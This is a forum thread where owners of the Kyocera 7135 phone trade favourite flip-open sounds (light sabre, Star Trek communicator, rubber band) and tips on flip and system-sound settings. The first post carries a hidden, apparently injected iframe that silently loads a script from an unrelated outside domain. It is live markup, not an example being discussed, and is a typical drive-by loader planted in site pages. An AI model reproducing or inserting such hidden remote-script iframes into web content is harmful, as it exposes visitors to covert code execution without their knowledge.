Poll: Do you have a flip-open sound?

+ Reply to Thread

7135 open-flip sound

Does yours still make a sound when you open it? If not, why not?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I love the flip sounds........ but use different ones for different occasions.

My favorite weekend/evening combo is Steve's light sabre open/close sounds... but they freak people out because they sound so real! (well, nobody has jumped under their desk in fear that Darth Vader was really in the building ... but you know what I mean ).

Sometimes, even though I'm not at work, I still need a more subtle combo of flip sounds, and then my favorite combo is the "super powers" open (one of the included sounds), and "leaving the Matrix" close (also a Steve creation I believe).

At work I generally stick with "rubber band" for both open and close. It's not a high pitched or annoying sound and doesn't seem to attract much attention.

Loud/long flip sounds can be a bit of a problem when using the MP3 player, since they play over the music... and I'm usually too lazy to turn off the flip sounds all together, so I just deal with it.
    Please visit my picture site: Robert-O-Rama :)

I use Plink - its low volume, and not attention grabbing or annoying.
    Mark
    ==========================
    Palm Personal > Palm V > Palm Vx > Clie 760 > Kyocera 7135 > Treo 600 >Treo 650 > (Maybe i730??)

Converged. It didn't even hurt! tuckeyr's Avatar
    I use the Star Trek communicator sound. It never fails to get a chuckle from people around me.

How do you get the sound to come up on the flip? (which I take to mean opening and closing the phone?) Is there a special setting to upload for that specifically?

Originally posted by liltiki
    How do you get the sound to come up on the flip? (which I take to mean opening and closing the phone?) Is there a special setting to upload for that specifically?
    It's in phone prefs under flip settings. If you want to use flip sounds other than the included ones do a search on "flip sounds" (that's what I did) and you'll find everything you need there Also, assuming you installed the included Kyocera ringer - MP3 maker software, if you open up that app it's very straight forward how to use it for converting MP3's for use on the 7135 in a variety of ways.

RE: Do you have a flip-open sound?

Yes I have lots of em-- My favorites are the same ones Markito pointed out! -- I just dont have my 7135....YET
    iPhone therefore iAm.

I use Steve's Light Saber sound and have gotten many compliments on. Thanks Steve.

I usually only turn the flip sound on when I want to demo the sound though. For those of you who don't have a 7135 yet you should know that the system sound must be enabled in order for the flip sound to to work. I had this turned off on my 6035 to avoid the annoying clicking sound each time I clicked on something

I use the flip sound but for a different reason. It's the only way I can tell, during day light hours, if the screen shut down when I closed the flip or if I need to reset the thing. If it doesn't "boing" I know I have to do a reset.

When I go to file manager I see some of the sounds all you are refering to ie. rubberband etc. I am familiar with the downloadable ones but I don't seem to have the ones that supposedly come with the 7135 itself. Any help would be greatly appreciated.
    Marc Chasin, MD

Giddyup, Giddyup, Giddyup 7135 TheBeachBoy's Avatar

System sound

Originally posted by pdageek
    I usually only turn the flip sound on when I want to demo the sound though. For those of you who don't have a 7135 yet you should know that the system sound must be enabled in order for the flip sound to to work. I had this turned off on my 6035 to avoid the annoying clicking sound each time I clicked on something
    Is there a way for the clicking sound to be shut off while the system sound is on? I would like the flips sounds, but not if it means I have to listen to those stupid clicks.

Thanks!
    TheBeachBoy

--The World's Greatest Drummer--
    Drummer for the Fondells

I love the star trek communicator sound, aptly renamed "Dolphin".

Larry
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by 1stcare
    When I go to file manager I see some of the sounds all you are refering to ie. rubberband etc. I am familiar with the downloadable ones but I don't seem to have the ones that supposedly come with the 7135 itself. Any help would be greatly appreciated.
    "rubberband, etc." are the ones that came with the 7135.

I am aware that those are the sounds that came with the 7135, however I am unable to obtain them. They do not come up as options to choose from
    Marc Chasin, MD

Originally posted by 1stcare
    I am aware that those are the sounds that came with the 7135, however I am unable to obtain them. They do not come up as options to choose from
    Where exactly are you at (on the 7135!) when you are trying to choose them? And, what choices do you have?

Sorry, I found it on the flip sound options.
    Marc Chasin, MD

It's time for me to answer my own question.
    I turned off system sounds just I did for the 6035. Also, I usually have the phone on vibe anyway... I guess my reason has little to do with the actual flip sound. When I want to show it off, I'll turn on the sound.

It just cracks me up when I open/close the phone to Steve's light sabre open/close sounds. I love if I need to be quite I can easily push the down vol button on the side of the phone. I am waiting for my phone to be returned to me and I miss the giggle.
    Linda

17" powerbook OSX

Originally posted by langpierce
    It just cracks me up when I open/close the phone to Steve's light sabre open/close sounds.
    Those are my favorites too! But at work they were a bit much since I open and close my 7135 so often